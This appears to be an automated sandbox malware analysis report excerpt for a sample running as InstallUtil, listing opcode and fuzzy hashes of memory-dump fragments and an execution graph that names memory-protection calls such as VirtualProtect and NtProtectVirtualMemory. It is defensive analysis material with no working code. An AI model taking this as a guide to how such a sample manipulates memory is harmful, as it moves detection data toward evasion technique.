                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb9b7749e04f28c0bc12712bf807508405a6e6574a8d9de4be9fbe40baf57431
                                                          • Instruction ID: 8918626d473d44931ac2c061b6c9e7896cc6fd4d2629e4d7dbf6930c846b257b
                                                          • Opcode Fuzzy Hash: cb9b7749e04f28c0bc12712bf807508405a6e6574a8d9de4be9fbe40baf57431
                                                          • Instruction Fuzzy Hash: 35B14C70E00209CFDF14CFA9D99179EBBF6BF58314F148529E815AB354EB749885CB81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67e9a86d09ab91eca1db0b29cc600ad85e091a0192c3f6228dda1d53b6a3fbde
                                                          • Instruction ID: a0fe40c8e56d32ee0af6a87efb3b30c6511f52940ce1a9f91c554645a3e4a1bf
                                                          • Opcode Fuzzy Hash: 67e9a86d09ab91eca1db0b29cc600ad85e091a0192c3f6228dda1d53b6a3fbde
                                                          • Instruction Fuzzy Hash: E9917C70E00209DFDF50CFA9C9857EDBBF6BF98314F148129E419AB294EB749885CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6039655967febc53f06309e2f92808387e2388513c4a979db684de7d692fc0b1
                                                          • Instruction ID: a1a99165022f817ba769e632c97f11c0313fa3b3af04cd6638d761155740f0b9
                                                          • Opcode Fuzzy Hash: 6039655967febc53f06309e2f92808387e2388513c4a979db684de7d692fc0b1
                                                          • Instruction Fuzzy Hash: 9351F2B0D102188FDB18CFA9C884B9EBBF5BF48714F14811AE819AB351D774A845CF95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83323a466f1116ba21ec281d7614b39444c2a59e844c1b8eae5dcc5cdd32b09b
                                                          • Instruction ID: 0c1f212bf77f01f6d238e37a0c040c5675eb2630f9d5d50ddba81d18fb683632
                                                          • Opcode Fuzzy Hash: 83323a466f1116ba21ec281d7614b39444c2a59e844c1b8eae5dcc5cdd32b09b
                                                          • Instruction Fuzzy Hash: 155103B0D10218CFDB18CFA9C884B9EBBF5BF48714F14851AE819AB351DB74A845CF95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 695629c3c6478c2c9612c6a3ad39520c9743cf1f76e03632a14fa836bce5cf58
                                                          • Instruction ID: 08d9a52cd53c54532d62123102957f046b0833e1905158f99ec5c5fc84badc12
                                                          • Opcode Fuzzy Hash: 695629c3c6478c2c9612c6a3ad39520c9743cf1f76e03632a14fa836bce5cf58
                                                          • Instruction Fuzzy Hash: DA514970B07281CFCB4ADB2CF8D85987F71EB9630474955EAD0405B636DA382D4ADBA3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34bdac737be1f51114dbc809cb87188ab10fc2e5616dfd66b71719ab69beb348
                                                          • Instruction ID: 242d295692547ef40284162bfbb9818befd61bb0e56f7c9e4de4a8a405d47dc8
                                                          • Opcode Fuzzy Hash: 34bdac737be1f51114dbc809cb87188ab10fc2e5616dfd66b71719ab69beb348
                                                          • Instruction Fuzzy Hash: 4841E335E00205CFCB15CFA8D89499EB7B9FF89314F10856AE805EB352DB719846CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d5b6f893d02eac15a0e2902aab712901aaba63950b7a5a90e05b49d41086c82
                                                          • Instruction ID: 59c2034d92a8c7d4eac744ff19c579f7a55de9a58e1f112ea43a7cbee6481749
                                                          • Opcode Fuzzy Hash: 4d5b6f893d02eac15a0e2902aab712901aaba63950b7a5a90e05b49d41086c82
                                                          • Instruction Fuzzy Hash: AF41A2B0B02241CFDB66DB2CF4C876C3B65F785315F405969E406CB666DA389C8A8B93
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 880518dc9fce9709be3ec443f38f2b707d65dece25eef804e2d992d5f225f3e5
                                                          • Instruction ID: 4958ebad7b9a0a7d6316770c8930b3c40fc72017e23b121b78321c2b26c9abd0
                                                          • Opcode Fuzzy Hash: 880518dc9fce9709be3ec443f38f2b707d65dece25eef804e2d992d5f225f3e5
                                                          • Instruction Fuzzy Hash: 4E31A6B5B016019FCB22DB7CE88477E77A9FB88250F104565E509CB255EB39DC428BD2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ebcda0003c023f69cd0b4487c12778ad8d5923f41e0f717991871cfc889ba90c
                                                          • Instruction ID: f2e379c7e5a0d9d3ad8c28b3b17cc79768c3f8a86575a14d68c55bebcd43dbee
                                                          • Opcode Fuzzy Hash: ebcda0003c023f69cd0b4487c12778ad8d5923f41e0f717991871cfc889ba90c
                                                          • Instruction Fuzzy Hash: 99411870B03241CFCB59DB6CF8C8A487BB1FB95304B4496E9E0005B636DA386D46DBA3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05dacad24e3325d7d381fa1be2ec7804eb5f1a0d9f268cc409c9eb42903b2932
                                                          • Instruction ID: 5de955b7dcecf7460b744c4bad6c466d0b154d5273f8aedf63e43611f2ddca82
                                                          • Opcode Fuzzy Hash: 05dacad24e3325d7d381fa1be2ec7804eb5f1a0d9f268cc409c9eb42903b2932
                                                          • Instruction Fuzzy Hash: 68410970B03241CFCB59DB6DF8C8948BBB1F79530474496E9E0005B63ADA386D4ADBA3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5ca0f8c40e7aea844277682f067205d5a58bca51930b895f05c947c907bcc8c
                                                          • Instruction ID: 0bb1a0dc0dcc85a6ec8845f0c82bc76694408d7f16537a6ee4faaf95b00accef
                                                          • Opcode Fuzzy Hash: f5ca0f8c40e7aea844277682f067205d5a58bca51930b895f05c947c907bcc8c
                                                          • Instruction Fuzzy Hash: 89316071F102069BCB19CF69E49469EBBF6FF89300F10851AE846EB350DB70AC46CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ae320b43d9130a878a90f6d21810fffc2ce44f1418738bb750157382959b1c2
                                                          • Instruction ID: 09a79eba060f01df868eb87da53c1c74a00128cb2daad5460a86dad9442071ae
                                                          • Opcode Fuzzy Hash: 7ae320b43d9130a878a90f6d21810fffc2ce44f1418738bb750157382959b1c2
                                                          • Instruction Fuzzy Hash: EB314135F106059BCB19DF69E49469EBBB6FF89300F10851AE806EB350DF70AC45CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: efec6b3e203fbd3b57f8657755ed2b6ccb3ab0299410575ed0884e97d88d7b6e
                                                          • Instruction ID: 4a5a3e08a64a2e23e9ab4a395ce236e2573355a8559b319aaa785c7dd416580e
                                                          • Opcode Fuzzy Hash: efec6b3e203fbd3b57f8657755ed2b6ccb3ab0299410575ed0884e97d88d7b6e
                                                          • Instruction Fuzzy Hash: 4E41FFB0D00349DFDB14CFA9C584ADEBFF5BF48310F248429E409AB250DB75A945CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 356b0071bd596b0c523c570f0ba9b78a3dfc348ad36a5b05be1202ee510dade9
                                                          • Instruction ID: 9c6e5fc5fb73431ed0e9532c4a621366e90f95b2701088807d5b5f5037e08b41
                                                          • Opcode Fuzzy Hash: 356b0071bd596b0c523c570f0ba9b78a3dfc348ad36a5b05be1202ee510dade9
                                                          • Instruction Fuzzy Hash: B541EEB0D00349DFDB14CFA9C984ADEBFF5BF48314F208429E819AB250DB79A945CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af3c90a31bff11c3616aca3a06f07c4c982c0cdce1fb2f6793fdb366293993a4
                                                          • Instruction ID: 2c6ce16ab0115293781cbfc58611120e2e36f345ca4ddf82c40012c1b2dc072b
                                                          • Opcode Fuzzy Hash: af3c90a31bff11c3616aca3a06f07c4c982c0cdce1fb2f6793fdb366293993a4
                                                          • Instruction Fuzzy Hash: 4B31BCB4A012414FDB22DB3CE8C876D3B69FB85354F0449A9E406CF566EA68DC468B93
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be019869f234957d192bb99efb5513d7bad1f153f896d52b10db9749f522c016
                                                          • Instruction ID: 2ef4434a2cec7bc6203afc3cdc342ae48c392d7a6f495cb8d7b6e9cc6c0f5ad9
                                                          • Opcode Fuzzy Hash: be019869f234957d192bb99efb5513d7bad1f153f896d52b10db9749f522c016
                                                          • Instruction Fuzzy Hash: 03212134B00215DFD749EBB8E49866E77A7FBC8714B20846CD50A8B3A5CF359C42DB92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef2787ea9392003a40f87e03b8a888e68ecf4ff5cfa53e09f44e405a168dd8d9
                                                          • Instruction ID: 484e6f779829d2cc78b4961f8580043f0eacb704c4128618c7112389f4a0b5b9
                                                          • Opcode Fuzzy Hash: ef2787ea9392003a40f87e03b8a888e68ecf4ff5cfa53e09f44e405a168dd8d9
                                                          • Instruction Fuzzy Hash: BB31B471F002069FDB05CF98D49469EB7B6FF89304F148519E805EB281EB71D846CB80
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93cea5853b58e27724223569c25858ce0ab298ef6518eb31cacb3c70cf1e40be
                                                          • Instruction ID: 48f8452f36839066b9b7328e628d0569f4d28ac63ccc42c3c2ccd964de1f2c77
                                                          • Opcode Fuzzy Hash: 93cea5853b58e27724223569c25858ce0ab298ef6518eb31cacb3c70cf1e40be
                                                          • Instruction Fuzzy Hash: 14217E31F0020A9FDB05CFA9D49469EBBB6FF89304F149619E805EB391DB709C46CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852227826.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14cd000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 205c3a064c88d961d328e7e8a528ed3e52a8ab17ccde7033b35ddded69cf2f90
                                                          • Instruction ID: 0fe4c79eefb6fbc339db2dfe23bf240813c11abbe412a9401f2f35f13d6bdcb6
                                                          • Opcode Fuzzy Hash: 205c3a064c88d961d328e7e8a528ed3e52a8ab17ccde7033b35ddded69cf2f90
                                                          • Instruction Fuzzy Hash: 2F21F1B9904200AFCB05DF58C9C0B66FB65FB84720F20C57EEA090A266C336E406C6E1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852315567.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14dd000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd5805d790f208eb91285b78fc2010320af5414b80947b15b2425f18a1027f16
                                                          • Instruction ID: 8fe1f458617c5fe07ac17aa00731054de57ac779fa0f45f07bcd9d14176d1f9f
                                                          • Opcode Fuzzy Hash: cd5805d790f208eb91285b78fc2010320af5414b80947b15b2425f18a1027f16
                                                          • Instruction Fuzzy Hash: D62103B1904200DFCF16DF58D9D0B26BB65EBC4358F24C56ED90A4B3A6C336D407CA61
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 905616f17822cc1fb83fab2cf2a12e8d175b2a37a097c510d4e26f2bd5e026b3
                                                          • Instruction ID: 527cf97e4ac2f27c2dfeb73b799d880a44193fbb3bfa84c84806ad409541bb16
                                                          • Opcode Fuzzy Hash: 905616f17822cc1fb83fab2cf2a12e8d175b2a37a097c510d4e26f2bd5e026b3
                                                          • Instruction Fuzzy Hash: B421A431E00606DFDB19CFA4D49499EB7B6BF89314F10852AE815FB391DB709846CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db2775e45b0a52ba486733fab25b4ce7273676c1dd65de97d7e948a6ff0aa2fe
                                                          • Instruction ID: 3e618c8b646bf93a35b3c8527d8866f13a3cafaf3ebd1d5cfa001f71a83f0bda
                                                          • Opcode Fuzzy Hash: db2775e45b0a52ba486733fab25b4ce7273676c1dd65de97d7e948a6ff0aa2fe
                                                          • Instruction Fuzzy Hash: 1D219231E0060ADFCB19CFA9D45499EB7B6BF89304F10861AE815FB381DB709846CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed5999df989c6c70b132aababf1a525f95ebffaa8294cc842ece49b02a073ab2
                                                          • Instruction ID: 319a59dd953ca21b583c13c32d76916f9eaf013aa66c6a78121259257bf42a50
                                                          • Opcode Fuzzy Hash: ed5999df989c6c70b132aababf1a525f95ebffaa8294cc842ece49b02a073ab2
                                                          • Instruction Fuzzy Hash: 91210930B00605CFDB54EB79C5956AE77FABB89245F204468D106EF3A0EB369D41CBE1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6830b1eb37781cf2a16ab6b95f761f6538323ccae9ebb41f4a6132fe3848e321
                                                          • Instruction ID: c1d8932328995d84c75bd1d23ac9673538b8486e1d94e1add223bbf6bf37b103
                                                          • Opcode Fuzzy Hash: 6830b1eb37781cf2a16ab6b95f761f6538323ccae9ebb41f4a6132fe3848e321
                                                          • Instruction Fuzzy Hash: 2E212730B00605CFDB55EF38C5946AE77FABF89201F2044A8D105EB2A0EB369D41CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c6f62bd3e9d51d6df266463c8eb62acb1eb89a6e13e415817658ebd93413eb
                                                          • Instruction ID: 6244199d9d3a6a923130a677d37e86ec46cd49cb023954700d8b7a53e620b5c5
                                                          • Opcode Fuzzy Hash: 25c6f62bd3e9d51d6df266463c8eb62acb1eb89a6e13e415817658ebd93413eb
                                                          • Instruction Fuzzy Hash: 05215E78B011014BDB26DB6CF8C876D3759F788354F105965E406CB656EE289C858B93
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852315567.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14dd000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 498e85c3fe0e9aed64641a12efb2fc5bbb3da4dfd486013773e7daf7eae7f431
                                                          • Instruction ID: e294afa526d4c916e4814e5fa9b0805383c56c934a10a03c925e1837bbf3389d
                                                          • Opcode Fuzzy Hash: 498e85c3fe0e9aed64641a12efb2fc5bbb3da4dfd486013773e7daf7eae7f431
                                                          • Instruction Fuzzy Hash: B82171B55083809FCB13CF64D994712BF71EB86214F28C5DBD8498F2A7C33A9846CB62
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fb417c9ed0d158bf2dc00384fe78e663f1f04c8cc234183e342a846a4554f58
                                                          • Instruction ID: 6a01b912582130050cc908e111ab646d27c743db8e51de1f632bbcfca7aadccc
                                                          • Opcode Fuzzy Hash: 5fb417c9ed0d158bf2dc00384fe78e663f1f04c8cc234183e342a846a4554f58
                                                          • Instruction Fuzzy Hash: 24116D31B102049FEF65DA7DE45472D32A9FB45354F10493AF006DF2D2DA65CC828BD2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2dc9799ee2932a8c2ea2a3f53c44ecdbe723d244ede79f2df63f789431c1159e
                                                          • Instruction ID: 1663c3b512f87fc6155d69bf9d04f1974af83123244d1b2d5902c80170a16009
                                                          • Opcode Fuzzy Hash: 2dc9799ee2932a8c2ea2a3f53c44ecdbe723d244ede79f2df63f789431c1159e
                                                          • Instruction Fuzzy Hash: D4119131B003049FEF66966DE45437D2299FB45350F10493EF406DF2C2DA65CC828BC2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852227826.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14cd000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                          • Instruction ID: 0d8eecd08ce4469c759db04a5daa7f8a1e7d8a0c72f85905eee90cc276ddbc25
                                                          • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                          • Instruction Fuzzy Hash: 0E11CD76804240DFCB02CF44D9C0B56FF62FB84324F24C6BAD9090A666C33AE45ACBA1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424ea206face462cae3ba6d86d622341ea904df626c58ecd67a4d5ac2c337a0a
                                                          • Instruction ID: d023c9420600bb3583faa239e2df0c319498a3e3788570af34230caf9ab09427
                                                          • Opcode Fuzzy Hash: 424ea206face462cae3ba6d86d622341ea904df626c58ecd67a4d5ac2c337a0a
                                                          • Instruction Fuzzy Hash: 81115E31E006158FCF61EFB885805AEBBF8BF98261B24047AD805EB741E736C941CBE5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 897770f46c01ede69723d187caeb4c8520574ee928dc2aca6717d0c903e96ec0
                                                          • Instruction ID: 390b7179ce01c92f3b8a4377324e9a2ad748a5ad378df6402d5e15fce6ca3763
                                                          • Opcode Fuzzy Hash: 897770f46c01ede69723d187caeb4c8520574ee928dc2aca6717d0c903e96ec0
                                                          • Instruction Fuzzy Hash: 27016131B006158FCF21EFB989805ADBBE8BB88251B14047AD805EB741EA35D941C7E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30a34ca40ab76824d2cd2f0bad1bf4ed6bffdbbcb5541ba6f3a6c550a11eaf41
                                                          • Instruction ID: e9dafdee4882982f259c91d42cae4260c30a60a28a2b9d366356592f1e6c9a09
                                                          • Opcode Fuzzy Hash: 30a34ca40ab76824d2cd2f0bad1bf4ed6bffdbbcb5541ba6f3a6c550a11eaf41
                                                          • Instruction Fuzzy Hash: 4001F270A012469FCB09DBA8F88498C3BB2EF41214F0056EDD400AB1A2DE342D46C783
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5429c05831e31047d2346d9e9d99f935a6a4efc8a24e5dc4901c259281121799
                                                          • Instruction ID: dfb3faf1ba248b534b4cc667e8952bc1c4532217385cb58ce704b6584ee3f64d
                                                          • Opcode Fuzzy Hash: 5429c05831e31047d2346d9e9d99f935a6a4efc8a24e5dc4901c259281121799
                                                          • Instruction Fuzzy Hash: F6F03C70A01109AFCB48EFA8F9C4A9D7BB5EB44304F5056ADC808AB255EE306E459B93

                                                          Execution Graph

                                                          Execution Coverage:11.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:283
                                                          Total number of Limit Nodes:18
                                                          execution_graph 54320 12b91e8 54321 12b9205 54320->54321 54322 12b9215 54321->54322 54326 63d517c 54321->54326 54329 63d41e2 54321->54329 54332 63d7d18 54321->54332 54336 63dd2a8 54326->54336 54331 63dd2a8 VirtualProtect 54329->54331 54330 63d01d9 54331->54330 54333 63d7d37 54332->54333 54335 63dd2a8 VirtualProtect 54333->54335 54334 63d7d5b 54335->54334 54338 63dd2cf 54336->54338 54340 63dd788 54338->54340 54341 63dd7d1 VirtualProtect 54340->54341 54343 63d01d9 54341->54343 54343->54322 54344 6364c20 54345 6364c6f NtProtectVirtualMemory 54344->54345 54347 6364ce7 54345->54347 54348 12b0880 54351 12b1890 54348->54351 54352 12b189b 54351->54352 54353 12b0896 54352->54353 54368 6377237 54352->54368 54371 637718c 54352->54371 54376 6377080 54352->54376 54379 6377142 54352->54379 54382 6377803 54352->54382 54385 637759c 54352->54385 54388 63772ab 54352->54388 54391 63777ad 54352->54391 54397 637736f 54352->54397 54400 63770e6 54352->54400 54403 63773b8 54352->54403 54406 637747a 54352->54406 54409 63770f0 54352->54409 54412 6377070 54352->54412 54369 63770cf 54368->54369 54415 636f630 54369->54415 54372 6377196 54371->54372 54595 6368298 54372->54595 54602 6368289 54372->54602 54373 63771d4 54377 63770a2 54376->54377 54378 636f630 10 API calls 54377->54378 54378->54377 54380 63770cf 54379->54380 54381 636f630 10 API calls 54380->54381 54381->54380 54383 63770cf 54382->54383 54384 636f630 10 API calls 54383->54384 54384->54383 54386 63770cf 54385->54386 54387 636f630 10 API calls 54386->54387 54387->54386 54389 63770cf 54388->54389 54390 636f630 10 API calls 54389->54390 54390->54389 54392 63777b7 54391->54392 54629 61ec568 54392->54629 54636 61ec520 54392->54636 54648 61ec510 54392->54648 54393 63777f5 54398 63770cf 54397->54398 54399 636f630 10 API calls 54398->54399 54399->54398 54401 63770cf 54400->54401 54402 636f630 10 API calls 54401->54402 54402->54401 54404 63770cf 54403->54404 54405 636f630 10 API calls 54404->54405 54405->54404 54407 63770cf 54406->54407 54407->54406 54408 636f630 10 API calls 54407->54408 54408->54407 54410 63770cf 54409->54410 54411 636f630 10 API calls 54410->54411 54411->54410 54413 63770a2 54412->54413 54414 636f630 10 API calls 54413->54414 54414->54413 54416 636f645 54415->54416 54423 65803cc 54416->54423 54427 6580006 54416->54427 54431 6580334 